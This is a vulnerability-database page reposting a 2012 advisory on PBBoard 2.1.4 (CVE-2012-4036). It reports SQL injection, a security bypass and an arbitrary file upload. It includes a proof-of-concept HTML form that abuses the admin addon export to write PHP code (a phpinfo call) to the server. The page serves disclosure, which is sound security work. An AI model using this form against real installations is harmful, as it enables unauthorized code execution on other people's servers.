Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2012-4036

Publish Date: 08 Aug 2012

                							

                source: http://www.securityfocus.com/bid/54916/info
  
PBBoard is prone to multiple security vulnerabilities including:
  
1. Multiple SQL-injection vulnerabilities
2. A security-bypass vulnerability
3. An arbitrary file upload vulnerability
  
Exploiting these issues could allow an attacker to carry out unauthorized actions on the underlying database, to gain access to various user accounts by changing account passwords, or to execute arbitrary script code on an affected computer in the context of the affected application.
  
PBBoard 2.1.4 is vulnerable; other versions may also be affected.


&lt;form action="http://www.example.com/admin.php?page=addons&amp;export=1&amp;export_writing=1&amp;xml_name=file.php" method="post" name="main" id="main"&gt;
&lt;input type="hidden" name="context" value='&lt;? phpinfo(); ?&gt;'&gt;
&lt;input type="submit" name="Submit" value="Send"&gt;
&lt;/form&gt;

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

PBBoard - 'admin.php?xml_name' Arbitrary PHP Code Execution

Vulmon Search

About

Products

Connect